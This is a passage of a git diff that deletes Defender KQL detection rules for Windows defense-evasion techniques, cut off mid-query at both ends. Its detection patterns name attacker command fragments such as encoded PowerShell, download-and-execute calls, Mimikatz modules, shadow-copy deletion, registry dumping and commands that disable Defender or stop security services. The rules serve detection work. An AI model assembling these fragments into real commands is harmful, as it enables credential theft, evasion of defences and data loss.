-| where ((ProcessIntegrityLevel =~ "System" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\ping.exe") or (ProcessCommandLine contains " -NoP " or ProcessCommandLine contains " -W Hidden " or ProcessCommandLine contains " -decode " or ProcessCommandLine contains " /decode " or ProcessCommandLine contains " /urlcache " or ProcessCommandLine contains " -urlcache " or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " JAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SUVYI") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SQBFAFgA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aWV4I") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " IAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " PAA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aQBlAHgA") or ProcessCommandLine contains "vssadmin delete shadows" or ProcessCommandLine contains "reg SAVE HKLM" or ProcessCommandLine contains " -ma " or ProcessCommandLine contains "Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains ".downloadstring(" or ProcessCommandLine contains ".downloadfile(" or ProcessCommandLine contains " /ticket:" or ProcessCommandLine contains "dpapi::" or ProcessCommandLine contains "event::clear" or ProcessCommandLine contains "event::drop" or ProcessCommandLine contains "id::modify" or ProcessCommandLine contains "kerberos::" or ProcessCommandLine contains "lsadump::" or ProcessCommandLine contains "misc::" or ProcessCommandLine contains "privilege::" or ProcessCommandLine contains "rpc::" or ProcessCommandLine contains "sekurlsa::" or ProcessCommandLine contains "sid::" or ProcessCommandLine contains "token::" or ProcessCommandLine contains "vault::cred" or ProcessCommandLine contains "vault::list" or ProcessCommandLine contains " p::d " or ProcessCommandLine contains ";iex(" or ProcessCommandLine contains "MiniDump" or ProcessCommandLine contains "net user "))) and (not((InitiatingProcessFolderPath contains ":\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or (ProcessCommandLine contains " -ma " and (FolderPath contains ":\\Program Files (x86)\\Java\\" or FolderPath contains ":\\Program Files\\Java\\") and FolderPath endswith "\\bin\\jp2launcher.exe" and (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Java\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Java\\") and InitiatingProcessFolderPath endswith "\\bin\\javaws.exe") or ProcessCommandLine =~ "ping 127.0.0.1 -n 5" or (FolderPath endswith "\\PING.EXE" and InitiatingProcessCommandLine contains "\\DismFoDInstall.cmd"))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Scheduled_Task_Creation_via_Masqueraded_XML_File.kql b/Defense Evasion/Suspicious_Scheduled_Task_Creation_via_Masqueraded_XML_File.kql
deleted file mode 100644
index 55ba5abb..00000000
--- a/Defense Evasion/Suspicious_Scheduled_Task_Creation_via_Masqueraded_XML_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel, Elastic (idea)
-// Date: 2023/04/20
-// Level: medium
-// Description: Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence
-// Tags: attack.defense_evasion, attack.persistence, attack.t1036.005, attack.t1053.005
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "/create" or ProcessCommandLine contains "-create") and (ProcessCommandLine contains "/xml" or ProcessCommandLine contains "-xml") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) and (not((ProcessCommandLine contains ".xml" or ((InitiatingProcessCommandLine contains ":\\WINDOWS\\Installer\\MSI" and InitiatingProcessCommandLine contains ".tmp,zzzzInvokeManagedCustomActionOutOfProc") and InitiatingProcessFolderPath endswith "\\rundll32.exe") or ProcessIntegrityLevel =~ "System"))) and (not(((InitiatingProcessFolderPath contains ":\\ProgramData\\OEM\\UpgradeTool\\CareCenter_" and InitiatingProcessFolderPath contains "\\BUnzip\\Setup_msi.exe") or InitiatingProcessFolderPath endswith ":\\Program Files\\Axis Communications\\AXIS Camera Station\\SetupActions.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Axis Communications\\AXIS Device Manager\\AdmSetupActions.exe" or InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Zemana\\AntiMalware\\AntiMalware.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Dell\\SupportAssist\\pcdrcui.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Service_Binary_Directory.kql b/Defense Evasion/Suspicious_Service_Binary_Directory.kql
deleted file mode 100644
index 684796f3..00000000
--- a/Defense Evasion/Suspicious_Service_Binary_Directory.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/03/09
-// Level: high
-// Description: Detects a service binary running in a suspicious directory
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where (FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\$Recycle.bin" or FolderPath contains "\\Users\\All Users\\" or FolderPath contains "\\Users\\Default\\" or FolderPath contains "\\Users\\Contacts\\" or FolderPath contains "\\Users\\Searches\\" or FolderPath contains "C:\\Perflogs\\" or FolderPath contains "\\config\\systemprofile\\" or FolderPath contains "\\Windows\\Fonts\\" or FolderPath contains "\\Windows\\IME\\" or FolderPath contains "\\Windows\\addins\\") and (InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Service_Installed.kql b/Defense Evasion/Suspicious_Service_Installed.kql
deleted file mode 100644
index 72b3dc93..00000000
--- a/Defense Evasion/Suspicious_Service_Installed.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: xknow (@xknow_infosec), xorxes (@xor_xes)
-// Date: 2019/04/08
-// Level: medium
-// Description: Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.
-Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)
-
-// Tags: attack.t1562.001, attack.defense_evasion
-DeviceRegistryEvents
-| where (RegistryKey in~ ("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\NalDrv\\ImagePath", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\PROCEXP152\\ImagePath")) and (not((RegistryValueData contains "\\WINDOWS\\system32\\Drivers\\PROCEXP152.SYS" and (InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procmon64.exe" or InitiatingProcessFolderPath endswith "\\procmon.exe" or InitiatingProcessFolderPath endswith "\\handle.exe" or InitiatingProcessFolderPath endswith "\\handle64.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Sigverif_Execution.kql b/Defense Evasion/Suspicious_Sigverif_Execution.kql
deleted file mode 100644
index a4a4205f..00000000
--- a/Defense Evasion/Suspicious_Sigverif_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution
-// Tags: attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\sigverif.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Splwow64_Without_Params.kql b/Defense Evasion/Suspicious_Splwow64_Without_Params.kql
deleted file mode 100644
index 819070d3..00000000
--- a/Defense Evasion/Suspicious_Splwow64_Without_Params.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects suspicious Splwow64.exe process without any command line parameters
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where ProcessCommandLine endswith "splwow64.exe" and FolderPath endswith "\\splwow64.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Usage_Of_ShellExec_RunDLL.kql b/Defense Evasion/Suspicious_Usage_Of_ShellExec_RunDLL.kql
deleted file mode 100644
index 620e4c12..00000000
--- a/Defense Evasion/Suspicious_Usage_Of_ShellExec_RunDLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/01
-// Level: high
-// Description: Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "ShellExec_RunDLL" and (ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "msiexec" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "odbcconf" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "iex" or ProcessCommandLine contains "comspec")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Userinit_Child_Process.kql b/Defense Evasion/Suspicious_Userinit_Child_Process.kql
deleted file mode 100644
index c667ab72..00000000
--- a/Defense Evasion/Suspicious_Userinit_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Samir Bousseaden (idea)
-// Date: 2019/06/17
-// Level: medium
-// Description: Detects a suspicious child process of userinit
-// Tags: attack.defense_evasion, attack.t1055
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\userinit.exe" and (not((ProcessCommandLine contains "\\netlogon\\" or (FolderPath endswith "\\explorer.exe" or ProcessVersionInfoOriginalFileName =~ "explorer.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_VBoxDrvInst.exe_Parameters.kql b/Defense Evasion/Suspicious_VBoxDrvInst.exe_Parameters.kql
deleted file mode 100644
index b314305f..00000000
--- a/Defense Evasion/Suspicious_VBoxDrvInst.exe_Parameters.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Konstantin Grishchenko, oscd.community
-// Date: 2020/10/06
-// Level: medium
-// Description: Detect VBoxDrvInst.exe run with parameters allowing processing INF file.
-This allows to create values in the registry and install drivers.
-For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys
-
-// Tags: attack.defense_evasion, attack.t1112
-DeviceProcessEvents
-| where (ProcessCommandLine contains "driver" and ProcessCommandLine contains "executeinf") and FolderPath endswith "\\VBoxDrvInst.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Volume_Shadow_Copy_VSS_PS.dll_Load.kql b/Defense Evasion/Suspicious_Volume_Shadow_Copy_VSS_PS.dll_Load.kql
deleted file mode 100644
index 714a3039..00000000
--- a/Defense Evasion/Suspicious_Volume_Shadow_Copy_VSS_PS.dll_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, @markus_neis
-// Date: 2021/07/07
-// Level: high
-// Description: Detects the image load of vss_ps.dll by uncommon executables
-// Tags: attack.defense_evasion, attack.impact, attack.t1490
-DeviceImageLoadEvents
-| where FolderPath endswith "\\vss_ps.dll" and (not((isnull(InitiatingProcessFolderPath) or ((InitiatingProcessFolderPath endswith "\\clussvc.exe" or InitiatingProcessFolderPath endswith "\\dismhost.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\inetsrv\\appcmd.exe" or InitiatingProcessFolderPath endswith "\\inetsrv\\iissetup.exe" or InitiatingProcessFolderPath endswith "\\msiexec.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\searchindexer.exe" or InitiatingProcessFolderPath endswith "\\srtasks.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\System32\\SystemPropertiesAdvanced.exe" or InitiatingProcessFolderPath endswith "\\taskhostw.exe" or InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\tiworker.exe" or InitiatingProcessFolderPath endswith "\\vssvc.exe" or InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith "\\wsmprovhost.exe") and InitiatingProcessFolderPath startswith "C:\\Windows\\") or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or (InitiatingProcessCommandLine contains "\\dismhost.exe {" and InitiatingProcessCommandLine startswith "C:\\$WinREAgent\\Scratch\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Volume_Shadow_Copy_Vssapi.dll_Load.kql b/Defense Evasion/Suspicious_Volume_Shadow_Copy_Vssapi.dll_Load.kql
deleted file mode 100644
index 76697076..00000000
--- a/Defense Evasion/Suspicious_Volume_Shadow_Copy_Vssapi.dll_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/10/31
-// Level: high
-// Description: Detects the image load of VSS DLL by uncommon executables
-// Tags: attack.defense_evasion, attack.impact, attack.t1490
-DeviceImageLoadEvents
-| where FolderPath endswith "\\vssapi.dll" and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache\\" or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\")))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Volume_Shadow_Copy_Vsstrace.dll_Load.kql b/Defense Evasion/Suspicious_Volume_Shadow_Copy_Vsstrace.dll_Load.kql
deleted file mode 100644
index ddc53c62..00000000
--- a/Defense Evasion/Suspicious_Volume_Shadow_Copy_Vsstrace.dll_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2023/02/17
-// Level: high
-// Description: Detects the image load of VSS DLL by uncommon executables
-// Tags: attack.defense_evasion, attack.impact, attack.t1490
-DeviceImageLoadEvents
-| where FolderPath endswith "\\vsstrace.dll" and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\")))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Vsls-Agent_Command_With_AgentExtensionPath_Load.kql b/Defense Evasion/Suspicious_Vsls-Agent_Command_With_AgentExtensionPath_Load.kql
deleted file mode 100644
index e272b115..00000000
--- a/Defense Evasion/Suspicious_Vsls-Agent_Command_With_AgentExtensionPath_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: bohops
-// Date: 2022/10/30
-// Level: medium
-// Description: Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "--agentExtensionPath" and FolderPath endswith "\\vsls-agent.exe") and (not(ProcessCommandLine contains "Microsoft.VisualStudio.LiveShare.Agent."))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_WMIC_Execution_Via_Office_Process.kql b/Defense Evasion/Suspicious_WMIC_Execution_Via_Office_Process.kql
deleted file mode 100644
index bf07a61d..00000000
--- a/Defense Evasion/Suspicious_WMIC_Execution_Via_Office_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Vadim Khrykov, Cyb3rEng
-// Date: 2021/08/23
-// Level: high
-// Description: Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).
-// Tags: attack.t1204.002, attack.t1047, attack.t1218.010, attack.execution, attack.defense_evasion
-DeviceProcessEvents
-| where (InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" or InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and ((ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "msiexec" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "verclsid" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript") and (ProcessCommandLine contains "process" and ProcessCommandLine contains "create" and ProcessCommandLine contains "call")) and (FolderPath endswith "\\wbem\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Windows_Defender_Folder_Exclusion_Added_Via_Reg.EXE.kql b/Defense Evasion/Suspicious_Windows_Defender_Folder_Exclusion_Added_Via_Reg.EXE.kql
deleted file mode 100644
index 633e76dc..00000000
--- a/Defense Evasion/Suspicious_Windows_Defender_Folder_Exclusion_Added_Via_Reg.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/02/13
-// Level: medium
-// Description: Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData.
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths" or ProcessCommandLine contains "SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Paths") and (ProcessCommandLine contains "ADD " and ProcessCommandLine contains "/t " and ProcessCommandLine contains "REG_DWORD " and ProcessCommandLine contains "/v " and ProcessCommandLine contains "/d " and ProcessCommandLine contains "0") and FolderPath endswith "\\reg.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Windows_Defender_Registry_Key_Tampering_Via_Reg.EXE.kql b/Defense Evasion/Suspicious_Windows_Defender_Registry_Key_Tampering_Via_Reg.EXE.kql
deleted file mode 100644
index 1e1cc728..00000000
--- a/Defense Evasion/Suspicious_Windows_Defender_Registry_Key_Tampering_Via_Reg.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/03/22
-// Level: high
-// Description: Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ((FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Windows Defender\\" or ProcessCommandLine contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center" or ProcessCommandLine contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\")) and (((ProcessCommandLine contains "DisallowExploitProtectionOverride" or ProcessCommandLine contains "EnableControlledFolderAccess" or ProcessCommandLine contains "MpEnablePus" or ProcessCommandLine contains "PUAProtection" or ProcessCommandLine contains "SpynetReporting" or ProcessCommandLine contains "SubmitSamplesConsent" or ProcessCommandLine contains "TamperProtection") and (ProcessCommandLine contains " add " and ProcessCommandLine contains "d 0")) or ((ProcessCommandLine contains "DisableAntiSpyware" or ProcessCommandLine contains "DisableAntiSpywareRealtimeProtection" or ProcessCommandLine contains "DisableAntiVirus" or ProcessCommandLine contains "DisableArchiveScanning" or ProcessCommandLine contains "DisableBehaviorMonitoring" or ProcessCommandLine contains "DisableBlockAtFirstSeen" or ProcessCommandLine contains "DisableConfig" or ProcessCommandLine contains "DisableEnhancedNotifications" or ProcessCommandLine contains "DisableIntrusionPreventionSystem" or ProcessCommandLine contains "DisableIOAVProtection" or ProcessCommandLine contains "DisableOnAccessProtection" or ProcessCommandLine contains "DisablePrivacyMode" or ProcessCommandLine contains "DisableRealtimeMonitoring" or ProcessCommandLine contains "DisableRoutinelyTakingAction" or ProcessCommandLine contains "DisableScanOnRealtimeEnable" or ProcessCommandLine contains "DisableScriptScanning" or ProcessCommandLine contains "Notification_Suppress" or ProcessCommandLine contains "SignatureDisableUpdateOnStartupWithoutEngine") and (ProcessCommandLine contains " add " and ProcessCommandLine contains "d 1")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Windows_Service_Tampering.kql b/Defense Evasion/Suspicious_Windows_Service_Tampering.kql
deleted file mode 100644
index 39f2a2c4..00000000
--- a/Defense Evasion/Suspicious_Windows_Service_Tampering.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2022/09/01
-// Level: high
-// Description: Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts
-// Tags: attack.defense_evasion, attack.t1489
-DeviceProcessEvents
-| where (ProcessCommandLine contains "143Svc" or ProcessCommandLine contains "Acronis VSS Provider" or ProcessCommandLine contains "AcronisAgent" or ProcessCommandLine contains "AcrSch2Svc" or ProcessCommandLine contains "Antivirus" or ProcessCommandLine contains "ARSM" or ProcessCommandLine contains "aswBcc" or ProcessCommandLine contains "Avast Business Console Client Antivirus Service" or ProcessCommandLine contains "avast! Antivirus" or ProcessCommandLine contains "AVG Antivirus" or ProcessCommandLine contains "avgAdminClient" or ProcessCommandLine contains "AvgAdminServer" or ProcessCommandLine contains "AVP1" or ProcessCommandLine contains "BackupExec" or ProcessCommandLine contains "bedbg" or ProcessCommandLine contains "BITS" or ProcessCommandLine contains "BrokerInfrastructure" or ProcessCommandLine contains "Client Agent 7.60" or ProcessCommandLine contains "Core Browsing Protection" or ProcessCommandLine contains "Core Mail Protection" or ProcessCommandLine contains "Core Scanning Server" or ProcessCommandLine contains "DCAgent" or ProcessCommandLine contains "EhttpSr" or ProcessCommandLine contains "ekrn" or ProcessCommandLine contains "Enterprise Client Service" or ProcessCommandLine contains "epag" or ProcessCommandLine contains "EPIntegrationService" or ProcessCommandLine contains "EPProtectedService" or ProcessCommandLine contains "EPRedline" or ProcessCommandLine contains "EPSecurityService" or ProcessCommandLine contains "EPUpdateService" or ProcessCommandLine contains "EraserSvc11710" or ProcessCommandLine contains "EsgShKernel" or ProcessCommandLine contains "ESHASRV" or ProcessCommandLine contains "FA_Scheduler" or ProcessCommandLine contains "FirebirdGuardianDefaultInstance" or ProcessCommandLine contains "FirebirdServerDefaultInstance" or ProcessCommandLine contains "HealthTLService" or ProcessCommandLine contains "MSSQLFDLauncher$" or ProcessCommandLine contains "hmpalertsvc" or ProcessCommandLine contains "HMS" or ProcessCommandLine contains "IISAdmin" or ProcessCommandLine contains "IMANSVC" or ProcessCommandLine contains "IMAP4Svc" or ProcessCommandLine contains "KAVFS" or ProcessCommandLine contains "KAVFSGT" or ProcessCommandLine contains "kavfsslp" or ProcessCommandLine contains "klbackupdisk" or ProcessCommandLine contains "klbackupflt" or ProcessCommandLine contains "klflt" or ProcessCommandLine contains "klhk" or ProcessCommandLine contains "KLIF" or ProcessCommandLine contains "klim6" or ProcessCommandLine contains "klkbdflt" or ProcessCommandLine contains "klmouflt" or ProcessCommandLine contains "klnagent" or ProcessCommandLine contains "klpd" or ProcessCommandLine contains "kltap" or ProcessCommandLine contains "KSDE1.0.0" or ProcessCommandLine contains "LogProcessorService" or ProcessCommandLine contains "M8EndpointAgent" or ProcessCommandLine contains "macmnsvc" or ProcessCommandLine contains "masvc" or ProcessCommandLine contains "MBAMService" or ProcessCommandLine contains "MBCloudEA" or ProcessCommandLine contains "MBEndpointAgent" or ProcessCommandLine contains "McAfeeDLPAgentService" or ProcessCommandLine contains "McAfeeEngineService" or ProcessCommandLine contains "MCAFEEEVENTPARSERSRV" or ProcessCommandLine contains "McAfeeFramework" or ProcessCommandLine contains "MCAFEETOMCATSRV530" or ProcessCommandLine contains "McShield" or ProcessCommandLine contains "McTaskManager" or ProcessCommandLine contains "mfefire" or ProcessCommandLine contains "mfemms" or ProcessCommandLine contains "mfevto" or ProcessCommandLine contains "mfevtp" or ProcessCommandLine contains "mfewc" or ProcessCommandLine contains "MMS" or ProcessCommandLine contains "mozyprobackup" or ProcessCommandLine contains "MsDtsServer" or ProcessCommandLine contains "MSExchange" or ProcessCommandLine contains "msftesq1SPROO" or ProcessCommandLine contains "msftesql$PROD" or ProcessCommandLine contains "MSOLAP$SQL_2008" or ProcessCommandLine contains "MSOLAP$SYSTEM_BGC" or ProcessCommandLine contains "MSOLAP$TPS" or ProcessCommandLine contains "MSOLAP$TPSAMA" or ProcessCommandLine contains "MSOLAPSTPS" or ProcessCommandLine contains "MSOLAPSTPSAMA" or ProcessCommandLine contains "mssecflt" or ProcessCommandLine contains "MSSQ!I.SPROFXENGAGEMEHT" or ProcessCommandLine contains "MSSQ0SHAREPOINT" or ProcessCommandLine contains "MSSQ0SOPHOS" or ProcessCommandLine contains "MSSQL" or ProcessCommandLine contains "MySQL" or ProcessCommandLine contains "NanoServiceMain" or ProcessCommandLine contains "NetMsmqActivator" or ProcessCommandLine contains "ntrtscan" or ProcessCommandLine contains "ofcservice" or ProcessCommandLine contains "Online Protection System" or ProcessCommandLine contains "OracleClientCache80" or ProcessCommandLine contains "PandaAetherAgent" or ProcessCommandLine contains "PccNTUpd" or ProcessCommandLine contains "PDVFSService" or ProcessCommandLine contains "POP3Svc" or ProcessCommandLine contains "POVFSService" or ProcessCommandLine contains "PSUAService" or ProcessCommandLine contains "Quick Update Service" or ProcessCommandLine contains "RepairService" or ProcessCommandLine contains "ReportServer" or ProcessCommandLine contains "ReportServer$" or ProcessCommandLine contains "RESvc" or ProcessCommandLine contains "RpcEptMapper" or ProcessCommandLine contains "sacsvr" or ProcessCommandLine contains "SamSs" or ProcessCommandLine contains "SAVAdminService" or ProcessCommandLine contains "SAVService" or ProcessCommandLine contains "ScSecSvc" or ProcessCommandLine contains "SDRSVC" or ProcessCommandLine contains "sense" or ProcessCommandLine contains "SentinelAgent" or ProcessCommandLine contains "SentinelHelperService" or ProcessCommandLine contains "SepMasterService" or ProcessCommandLine contains "ShMonitor" or ProcessCommandLine contains "Smcinst" or ProcessCommandLine contains "SmcService" or ProcessCommandLine contains "SMTPSvc" or ProcessCommandLine contains "SNAC" or ProcessCommandLine contains "SntpService" or ProcessCommandLine contains "Sophos" or ProcessCommandLine contains "SQ1SafeOLRService" or ProcessCommandLine contains "SQL Backups" or ProcessCommandLine contains "SQL Server" or ProcessCommandLine contains "SQLAgent" or ProcessCommandLine contains "SQLBrowser" or ProcessCommandLine contains "SQLsafe" or ProcessCommandLine contains "SQLSERVERAGENT" or ProcessCommandLine contains "SQLTELEMETRY" or ProcessCommandLine contains "SQLWriter" or ProcessCommandLine contains "SSISTELEMETRY130" or ProcessCommandLine contains "SstpSvc" or ProcessCommandLine contains "svcGenericHost" or ProcessCommandLine contains "swc_service" or ProcessCommandLine contains "swi_filter" or ProcessCommandLine contains "swi_service" or ProcessCommandLine contains "swi_update" or ProcessCommandLine contains "Symantec" or ProcessCommandLine contains "Telemetryserver" or ProcessCommandLine contains "ThreatLockerService" or ProcessCommandLine contains "TMBMServer" or ProcessCommandLine contains "TmCCSF" or ProcessCommandLine contains "TmFilter" or ProcessCommandLine contains "TMiCRCScanService" or ProcessCommandLine contains "tmlisten" or ProcessCommandLine contains "TMLWCSService" or ProcessCommandLine contains "TmPfw" or ProcessCommandLine contains "TmPreFilter" or ProcessCommandLine contains "TmProxy" or ProcessCommandLine contains "TMSmartRelayService" or ProcessCommandLine contains "tmusa" or ProcessCommandLine contains "Trend Micro Deep Security Manager" or ProcessCommandLine contains "TrueKey" or ProcessCommandLine contains "UI0Detect" or ProcessCommandLine contains "UTODetect" or ProcessCommandLine contains "Veeam" or ProcessCommandLine contains "VeeamDeploySvc" or ProcessCommandLine contains "Veritas System Recovery" or ProcessCommandLine contains "VSApiNt" or ProcessCommandLine contains "VSS" or ProcessCommandLine contains "W3Svc" or ProcessCommandLine contains "wbengine" or ProcessCommandLine contains "WdNisSvc" or ProcessCommandLine contains "WeanClOudSve" or ProcessCommandLine contains "Weems JY" or ProcessCommandLine contains "WinDefend" or ProcessCommandLine contains "wozyprobackup" or ProcessCommandLine contains "WRSVC" or ProcessCommandLine contains "Zoolz 2 Service") and ((ProcessCommandLine contains " stop " and ((ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe"))) or ((ProcessCommandLine contains "Stop-Service " or 